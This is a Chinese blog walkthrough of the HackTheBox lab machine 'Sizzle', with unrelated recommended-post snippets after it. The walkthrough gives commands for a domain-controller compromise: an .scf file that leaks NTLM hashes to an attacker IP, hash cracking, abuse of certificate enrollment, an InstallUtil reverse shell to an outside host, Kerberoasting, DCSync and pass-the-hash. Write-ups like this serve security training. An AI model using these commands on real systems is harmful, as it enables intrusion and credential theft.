[Meachines] [Insane] Sizzle AD域+DC控制器+.scf窃取NTLM+ADCS证书注册Web服务+PSByPassCLM受限Bypass+DCSync权限提升

于 2024-10-02 16:44:48 发布
阅读量551 收藏 6
点赞数 12
分类专栏: HackTheBox 文章标签: 前端
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/142682647
版权

信息收集

IP AddressOpening Ports
10.10.10.103TCP:21, 53, 80, 135, 139, 443, 445, 464, 593, 636, 3268, 3269, 5985, 5986, 9389, 47001

$ nmap -p- 10.10.10.103 --min-rate 1000 -sC -sV -Pn

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-15T01:53:09+00:00; -7m35s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-15T01:53:11+00:00; -7m34s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-15T01:53:10+00:00; -7m34s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-15T01:53:10+00:00; -7m34s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
|_ssl-date: 2019-01-15T01:53:10+00:00; -7m35s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=1/14%Time=5C3D3E4D%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB && .scf

如果使用smbmap会报错

image-1.png

$ smbclient -N -L \\\\10.10.10.103

image.png

获取允许访问的目录

$ smbclient -N -L \\\\10.10.10.103 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do echo "======${share}======"; smbclient -N "//10.10.10.103/${share}" -c dir; echo; done

image-2.png

# mkdir -p /mnt/10.10.10.103

# mount -t cifs "//10.10.10.103/Department Shares" /mnt/10.10.10.103

image-3.png

找到了一些用户

Public amanda amanda_adm bill bob chris henry joe jose lkys37en morgan mrb3n

scf get NetNTLMv2

在public目录创建1.scf

[Shell]
Command=2

IconFile=\\10.10.16.12\icon

$ sudo responder -I tun0

image-4.png

amanda::HTB:d3f7c7ba82bc852e:5303E82C9CC3D2753D1223C5C2A7208F:0101000000000000001630CD5311DB016FCA8DB03406550300000000020008004E0037004800560001001E00570049004E002D00580031004A00310047003300470048004C0038004E0004003400570049004E002D00580031004A00310047003300470048004C0038004E002E004E003700480056002E004C004F00430041004C00030014004E003700480056002E004C004F00430041004C00050014004E003700480056002E004C004F00430041004C0007000800001630CD5311DB0106000400020000000800300030000000000000000100000000200000AA6C757924875383D823CFA4AAE98627AFED9C1B8258F7B1597CADE1C5EAC1E80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003200000000000000000000000000

$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt --force

image-5.png

AMANDA::HTB:ee1fd9c7201c2a31:f4fd2428ab3107d72e46472a28add345:0101000000000000c0653150de09d2017b51a16fdf651c2d000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d20106000400020000000800300030000000000000000100000000200000aacd5acb75c0e2b759dd79265572393ca79cf1ad76837fdd836686e2dc5f78bd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003500000000000000000000000000:Ashare1972

$ smbmap -H 10.10.10.103 -u amanda -p Ashare1972

image-6.png

Active Directory Certificate Services 中的证书注册Web服务"

https://10.10.10.103/certsrv/

username:amanda password:Ashare1972

image-8.png

$ openssl genrsa -des3 -out amanda.key 2048
$ openssl req -new -key amanda.key -out amanda.csr

$ cat amanda.csr 

-----BEGIN CERTIFICATE REQUEST-----
MIICszCCAZsCAQAwbjELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEMMAoGA1UEAwwDQUFB
MRkwFwYJKoZIhvcNAQkBFgpBQUFAQUEuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAl3/frmJNJFer1PdHEqWQkFqgf+nq1DnMbe2NhC8Tnhp7qef0
xxiZ4qLKplHFjt16KDcEz/JQZfiF51i6qKfv08kP/cDiE7OXCvVBAYUPp3paOe27
2ePUD22iF2FDfNApfiP3Rr6uKVLIfWgavvKXB756ReItvUCLuMt6Mi6MKrcqhpkf
tBms/lRiEKLtpbYAfGDNmjAbYScINCGPXgfBhQJ+5hZFf8GZ2AflR5VnodbRB79G
P1jLNo+PpGt9UFP8APrw8awCiA9ju56a1L156ndZ8V08rWOq2y0AhZo1Lm8YUIsV
cnU8XfukWlmJQ35W6lWNJnCzAjT4F3MTZ5iKlwIDAQABoAAwDQYJKoZIhvcNAQEL
BQADggEBAAfxREwy7enfWUWDXyljbkR60XFcLW91EXuxB5/taD3/k/qUKCqT2bqp
PdHx/GQxaTon5sxNWwH4uB+dISlUHYGZ03powG0oFjTSnql7/Kv1iec8pAu0pyil
5uVjt38PVfwOcuSb03IwP1urQ+GzyD68EDLdgOFL9nn6EXaCvfhalWNlLzjAPPV9
XBxOQxX3nxxrZX7yeHeEupQZYYD5Huni70aQU/V/5OuVjOZWyhwc4WW0cNm0exPY
RzyLJoBtueX3bKNgVgFo51qF/ziN+hy+pSEsit2sR/TO7Z7RrqqD0cOi2b+JKqk4
ApaUxTN5NVXAqJg+mx0V19rHcSyhuzE=
-----END CERTIFICATE REQUEST-----

image-9.png

https://10.10.10.103/certsrv/certrqxt.asp

image-11.png

下载base64编码版的

image-12.png

$ cp amanda.cer amanda.crt

https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rb

image-19.png

$ ruby winrm-shell.rb

image-13.png

PSByPassCLM Bypass

https://github.com/padovah4ck/PSByPassCLM

PS htb\amanda@SIZZLE Documents> $executioncontext.sessionstate.languagemode

这个结果意味着 PowerShell 运行在受限语言模式下,限制了某些功能以提高安全性。

image-14.png

PS htb\amanda@SIZZLE Documents> copy //10.10.16.12/share/PsBypassCLM.exe ./

PS htb\amanda@SIZZLE Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U /revshell=true /rhost=10.10.16.12 /rport=10017 \users\amanda\Documents\PsBypassCLM.exe

image-15.png

amanda –> mrlky

PS C:\Users\amanda\Documents> netstat -ano

image-17.png

https://github.com/GhostPack/Rubeus

PS C:\windows\temp> copy //10.10.16.12/share/Rubeus.exe ./

PS C:\windows\temp> .\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

image-18.png

$krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$1DD276F5FB0297F4BB3A69DCE2EA94A3$3BE6F93528230B53E00CAEF4ED763ACD399159A2F56F5C0EC0C301088F74CECD9B1FBA96E10423C1210555A27CAEA15F0BF590E79B149500AD3E3233514BD4E4654B8473BF4E99FCF24933967A2A3FA0C62A97EA2FE672D714B8AC9A68429D7F308AE6ACFA93A1307B262F526FEF2E25E9569F9FAD9F034D674FD7949263DD7DBF31D189275CCF0DE6202FA3B6A35C280F4E2572DF7497B75CAD32D0291E637DDD10BF5506D1E766EF01A1021487DE75218FB5B23CE6FA762DC7794763A02F5C0CF7132A7D2FBA2C4AB415ECA9E836075445B067CD852725F2C6294666C0EF2C3E361D028D2D73FD993B6C89175D9F6ADAE0D367A5E80F86E03864350788B1DCBFDF3DF593B159346DEBD2EDC594BA232B7A6D7EC190D273E05D3018DA482068964F871469E028763FC40E937855F897349E29D0DA3AEB3E88CE5429F53BCA5F63CFB2DC25F050C2AB63BA947DA617C4014A837BBE6A5FDFC8504FC089CAEB321C8FE219540FB3DA66460D61098FBEFE0B86EE650B29C2C5CCFC13A9BF1D3508846942B8A1D187A1C861AF3303BE7C719B3423464CACAABC30AAAFD605618B68440D25F2427CF7CAD854F658EDCDF33E18F5C9C7B6166DC9E5DA6884B9B5A810D1CFA7B7BE5F8BCFA9E9F125B4375F7962871BF02E8BC281AF9D68324DFE4DE02375C67E0FC343E76202B5BA00F6FD6F1BEC8EDBE685DF26C14A3D9D2E0824A14C37F8BAA0A33F70893A63EC2ECAB55D559FF42355F415623E5ABAA34847E57499D296D69FF0AFFBE15141B42DD1817B5D0B437597A735A8B6A10B98417A1D9144D68D48B81F8BDCA89D0F4739B25629EBAE0EBAD35276C2E64D293067DF9F6434FEB1E31CB6675AE22F5D952D38FD07550FB54FD7B601977E4AA16A964714807D38B9FCFD3A88126C3B3029A812B577210B47A605BB17394F51DAEFD00D60304768ABD8ED1F1936251116C93CD2514FFCA03628B9F866E94A08EC6CECEF573EED39FE161C8354891E12CC195E1B02E731C3B03E58E2C4FBD72F6371E2915033D56B885C46065122B41BF9F4DB25A17AF64F0AC62F20E68625D8B39024AFF24EFE8B54EDDC5BA336DC84C4A2FFE11CC7DBB863D76791DCEDD2811AA6048E4C0B94B2D30BF1BB5FA2163CB76285A841BB08E6ED9CE740D12C9F35877969FA8DF6D27C08EC26E5B4E7D6F2AEC9E82DF347D180380425DCBD6781E8EAC8F3AC3CFE54C18A972C893C1893EFBDFDEE49465F72C7ED78C71E1217104D214C2E92B0CBC40DB06FBB7DE6BC80BA2839E5F0C431D4152AB4C2A02E538935FD08B5D304FC8D84E722F66644BD0659F99FAF78CEEDCA443132CCF9B792AEF02B473B4D7A6AB9E945585BB

$ hashcat -m 13100 -a 0 tgt /usr/share/wordlists/rockyou.txt --force

Football#7

同样方法创建mrlky的证书

输入mrlky用户密码

image-20.png

$ openssl genrsa -des3 -out mrlky.key 2048
$ openssl req -new -key mrlky.key -out mrlky.csr

$ cat mrlky.csr

image-21.png

$ cp mrlky.cer mrlky.crt

$ ruby winrm-shell_mrlky.rb

image-22.png

User.txt

142f5652463ac38124e3adf5a1b5f402

Privilege Escalation - DCSync

$ impacket-secretsdump -just-dc mrlky:Football#7@10.10.10.103

image-25.png

$ impacket-psexec administrator@10.10.10.103 -hashes 336d863559a3f7e69371a85ad959a675:f6b7160bfc91823792e0ac3a162c9267

image-26.png

Root.txt

07b28721aa122e7bfcd54ab1dc06c57a

Мартин.
关注
专栏目录
android+ape解码,APE格式及编解码说明
weixin_39790504的博客
06-07 544
APE结构组成APE_DESCRIPTOR描述信息APE_HEADER头Table表(Wav头)标识头Frame*帧1,APE_DESCRIPTOR:APE结构的描述数据块。它描述了APE的长度,偏移量等信息内容<4*1>cID[4]必须为:‘MAC‘版本号<4>nVersion大于3980为现有的新版本,其他的为老式的压缩编解码描述块<4>nDescript...
[Meachines] [Insane] Bankrobber XSS-MDOG+SQLI+XSRF+Local-RCE+Bankv2转账模拟应用缓冲区溢出
08-30 1799
#XSS-MDOG #SQLI #XSRF #Local-RCE #Bankv2转账模拟应用缓冲区溢出
MySQL的索引(普通索引、唯一索引,主键索引、组合索引、全文索引、空间索引)相关操作
迷茫与徘徊只会让你陷入绝境,欢迎私信博主,带你开始提升变现价值!
04-10 5314
目录 索引介绍 Hash索引和B+tree索引的区别 应用场景 索引分类 普通索引 创建单列索引——普通索引(3种语法) 查看数据库中的索引 查看数据表中的索引 删除索引 唯一索引 主键索引 组合索引 创建和删除组合索引 全文索引 全文索引的案例 空间索引 索引的优点 索引的缺点 创建索引的原则 Hash算法 二叉树 平衡二叉树 BTREE树 每文一语 索引介绍 索引是通过某种算法,构建出一个数据模型,用于快速找出在某个列中有一特定值的行,不使用索引,..
[Meachines] [Insane] Brainfuck WordPress Ticket System任意用户登录+STMP邮件泄露+维吉尼亚密码解密+TRP00F自动化权限提升+RSA解密
08-18 1440
#WordPress Ticket System任意用户登录 #STMP邮件泄露 #维吉尼亚密码解密 #TRP00F自动化权限提升 #RSA解密
ZYNQ UltraScale+ MPSoC OpenAMP 2019.1
李易达 的博客
03-02 2782
ZYNQ UltraScale+ MPSoC OpenAMP 2019.1 本文面旨在补充 适用于 Zynq-7000 和 Zynq UltraScale+ MPSoC 的UG1186“LibMetal 和 OpenAMP 用户指南” (2019.1) 。 目录ZYNQ UltraScale+ MPSoC OpenAMP 2019.1快试试!文档和源代码文件源代码的 URLXilinx Openamp 和 Libmetal 相关代码其他示例ZynqMP Linux Master 运行在 APU 上
ZYNQ UltraScale+ MPSoC OpenAMP 2018.3
李易达 的博客
03-02 3040
ZYNQ OpenAMP 2018.3 ​ 本文只是对 UG1186 “入门指南”的补充和阐明(适用于 Zynq UltraScale+ MPSoC。) ​快速尝试 以下是启动 Linux 和使用预构建映像运行 openamp 应用程序的基本步骤。 例如对于 ZCU102: Echo测试应用程序将数据包从运行在四核 Cortex-A53 上的 Linux 发送到运行 FreeRTOS 的单个 Cortex-R5,然后再将它们发回。 将文件 BOOT.BIN、image.ub 和 openamp.dtb
渗透之——Nmap+Zenmap+Amap+Zmap
热门推荐
冰河的专栏
11-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84204992 Nmap 第一部分 Nmap基础 一、Nmap功能 基本功能有三个:     1.探测主机是否在线;     2.扫描主机端口,嗅探所提供的网络服务     3.推断主机操作系统      主机探测:     探测网路上的主机,例如列出相应TCP和ICMP请求,i...
废物的靶场日记 hackthebox-lame+brainfuck
m0_53302733的博客
03-27 1618
废物的靶场日记 hackthebox-lame+brainfuck 之前都是做active的机器 为什么突然开始做简单的退役靶机了呢 因为打算过段时间去考个oscp 看到了一份htb上应该做的清单 就先一个个做下去吧 Lame easy难度 靶机IP 10.10.10.3 nmap -sV -A -Pn 10.10.10.3 好像是不能ping的 加个-Pn 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.
Python3+requests:使用post实现文件上传服务器
weixin_34419326的博客
06-13 7113
原文链接 www.cnblogs.com/insane-Mr-L… 此文的multipart方式解决了我需要把图片文件上传服务器的问题 我们要知道post请求四种传送正文方式首先需要先了解一下常见的四种编码方式:   HTTP 协议规定 POST 提交的数据必须放在消息主体(entity-body)中,但协议并没有规定数据必须使用什么编码方式。常见的四种编码方式如下:   ♦1、applicati...
Insane's weBBoard-开源
04-24
"Insane's weBBoard-开源"是一款基于PHP和MySQL技术构建的开源论坛系统,它为用户提供了丰富的功能和互动体验。PHP是一种广泛使用的服务器端脚本语言,尤其适合Web开发,而MySQL则是一种高性能的关系型数据库管理...
Chither.com - insane slither io bots !-crx插件
04-05
语言:English ...在agar.io上添加一些东西 ...仅限IIO:FreeBots - 50或60个机器人免费! NB:agario的机器人不再推动了 agario仍然存在: - 剧数 - 为客户提供自制 滑动特点: - 自动关注机器人 - 启用/禁用遵循 - 对...
c++ 向量复制_在C ++中复制向量的不同方法
cumtb2009的博客
07-18 2283
c++ 向量复制In this article, we are going to see how to copy a vector into another vector in various ways? We will also learn about shallow copy and deep copy, their differences, and consequences while ch...
登录功能开发 P167重点
最新发布
2303_81204446的博客
09-30 220
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 474
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
前端规范工程-2:JS代码规范(Prettier + ESLint)
Vinca@的博客
09-26 778
Prettier 主要关注代码的格式,而 ESLint 则关注代码的质量和规范。结合使用这两个工具,可以极大地提高代码的可读性和维护性,同时减少潜在的错误和不一致性。
前端面试经验总结2(经典问题篇)
rita_0567的博客
09-28 907
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
基于webComponents的纯原生前端框架
u013776700的博客
09-28 184
采用artComponent模板引擎,在数据更新后实现UI更新,当然这里做了优化处理,尽量减小页面渲染受影响的范围,实现最小化更新。基于框架,开发了一套常用UI组件,提升开发速度。组件库采用开放原则,也就是说别人都可以使用我的开发接口去开发组件库。我本人的个人开发web前端前框架xui,正在开发中,业已完成50%的核心开发工作,并且在开发过程中逐渐完善.目前框架未采用任何和市面上框架模式,没有打包过程,实现真实的开箱即用。框架完成了事件触发和事件监听的封装,在页面和组件事件处理上更加方便。
构建.NET Core Web API为Windows服务安装包
学习和分享
09-28 302
请注意,以上步骤仅适用于将.NET Core Web API作为Windows服务安装。如果需要更高级的功能,例如服务启动类型、日志记录等,可能需要进一步的自定义和配置。安装完成后,.NET Core Web API将作为Windows服务在目标服务器上运行。可以通过NuGet包管理器或在.csproj文件中手动添加引用。方法,以便将Web API应用程序作为Windows服务运行。创建一个新的.NET Core Web API项目或使用现有的项目。文件夹中,找到发布的Web API应用程序和安装脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值